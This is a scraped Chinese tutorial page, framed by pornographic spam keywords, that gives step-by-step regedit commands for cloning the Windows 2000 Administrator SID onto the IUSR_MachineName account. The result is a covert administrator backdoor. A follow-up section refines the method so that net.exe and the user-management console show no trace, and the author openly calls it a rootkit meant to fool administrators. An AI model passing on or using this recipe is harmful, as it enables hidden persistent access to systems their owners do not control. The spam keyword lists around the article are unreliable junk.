色综合图-色综合图片-色综合图片二区150p-色综合图区-玖玖国产精品视频-玖玖香蕉视频

您的位置:首頁技術(shù)文章
文章詳情頁

克隆windows 2000管理員帳號

瀏覽:94日期:2023-08-27 10:02:39
首先要讓大家知道的概念是在Windows 2000和Windows NT里,默認(rèn)管理員帳號的SID是固定的500(0x1f4),那么我們可以用機(jī)器里已經(jīng)存在的一個帳號將SID為500的帳號進(jìn)行克隆,在這里我們選擇的帳號是IUSR_MachineName(當(dāng)然,為了加強(qiáng)隱蔽性,我們選擇了這個帳號,所有用戶都可以用以下的方法,只不過這個用戶較常見罷了),測試環(huán)境為Windows 2000 Server。 運(yùn)行一個System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在該CMD Shell里面運(yùn)行 regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4 這樣我們將SID 為500的管理員帳號的相關(guān)信息導(dǎo)出,然后編輯adam.reg文件,將adam.reg文件的第三行-[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]最后的'1F4'修改為IUSR_MachineName的SID(大部分的機(jī)器該用戶的SID都為0x3E9,如果機(jī)器在最初安裝的時候沒有安裝IIS,而自己創(chuàng)建了帳號后再安裝IIS就有可能不是這個值),將Root.reg文件中的'1F4'修改為'3E9'后執(zhí)行 regedit /s adam.reg 導(dǎo)入該Reg文件 然后運(yùn)行 net user IUSR_MachineName Sometips 修改IUSR_MachineName的密碼(最好使用14位的密碼,越像IUSR_MachineName的密碼越好) OK,大功告成... 這樣,我們擁有和默認(rèn)管理員一樣的桌面、一樣的Profile..... 而且,當(dāng)我們運(yùn)行 net localgroup administrators 時,看看結(jié)果: C:>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------ Administrator The command completed successfully. 再看看USER2SID的輸出結(jié)果: C:>user2sid Administrator S-1-5-21-1004336348-1078145449-854245398-500 Number of subauthoritIEs is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser C:>user2sid iusr_machinename S-1-5-21-1004336348-1078145449-854245398-1001 Number of subauthorities is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser 我想,再高明的管理員也看不到任何的異狀了...而且,隨便管理員改成什么密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登陸...(沒有哪位大俠級的管理員喜歡經(jīng)常修改IUSR_MachineName為其他的名字吧) ^_^,這算不算RootKit... 附: 1、感謝叮叮付出需要reinstall OS的代價(jià)... 2、任何用以上方法進(jìn)行試驗(yàn)所導(dǎo)致的系統(tǒng)無法使用均與偶無關(guān),偶均不提供技術(shù)支持... ----------------------------------------------------------------------------- 叮叮 的補(bǔ)充完善 很多人提到使用了管理工具的用戶管理后,能夠發(fā)現(xiàn)IUSR_MachineName被提升了權(quán)限。 現(xiàn)給出解決辦法。 方法同上,不過這次修改內(nèi)容多一些。即 這次要導(dǎo)出兩個key內(nèi)容: 一個是adam提到的 regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4 然后另外一個是你需要修改那個賬號的值 regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00003E9 然后按照adam提到的修改adam.reg “將adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]最后的'1F4'修改為IUSR_MachineName的SID” 現(xiàn)在,你還要從iusr.reg文件中復(fù)制一下內(nèi)容 就是將iusr.reg文件中“'V'=hex:0”開始一直到iusr.reg文件結(jié)束部分復(fù)制下來 然后替換掉adam.reg中同樣位置的部分 最后使用 regedit /s adam.reg 導(dǎo)入該Reg文件 呵呵,別忘了給這個IUSR_MachineName改密碼哦。 hehe,ok,大功告成。 現(xiàn)在IUSR_MachineName賬號擁有了管理員的權(quán)限,但是你使用net.exe和 管理工具中的用戶管理都將看不到任何痕跡,即使你去察看所屬于的組和用戶。 都和修改前沒有任何區(qū)別。 好了,補(bǔ)充結(jié)束。
標(biāo)簽: Windows系統(tǒng)
主站蜘蛛池模板: 久久黄色精品视频 | 久久国产精品永久免费网站 | 欧美一级精品高清在线观看 | 真人毛片视频 | 欧美成人免费夜夜黄啪啪 | 全部精品孕妇色视频在线 | 亚洲国产激情一区二区三区 | 亚洲精品日本高清中文字幕 | 99国内视频| 欧美精品久久久亚洲 | 全部免费国产潢色一级 | 手机在线毛片免费播放 | 成人毛片免费观看视频在线 | 91精品国产综合成人 | 欧美巨乳在线观看 | 一级特黄特黄的大片免费 | 亚洲视频国产 | 欧美一级毛片欧美一级成人毛片 | 国产成人一区免费观看 | 成人a站 | 韩国日本三级在线观看 | 久草播放 | 国产午夜在线观看视频播放 | 亚洲午夜国产精品 | 日本一区二区三区高清在线观看 | 制服诱惑中文字幕 | 国产婷婷一区二区三区 | 欧美二级在线观看免费 | 国产欧美日韩三级 | 久久这里只有精品免费视频 | 日本高清色本在线www游戏 | 精品在线一区二区 | 欧美成人免费午夜全 | 国产爽的冒白浆的视频高清 | 久操影视 | xh98hx国产在线视频 | 国产精品秦先生手机在线 | 国产成人18黄网站免费 | 欧美一区二区三区男人的天堂 | 9久9久热精品视频在线观看 | 国产精品9 |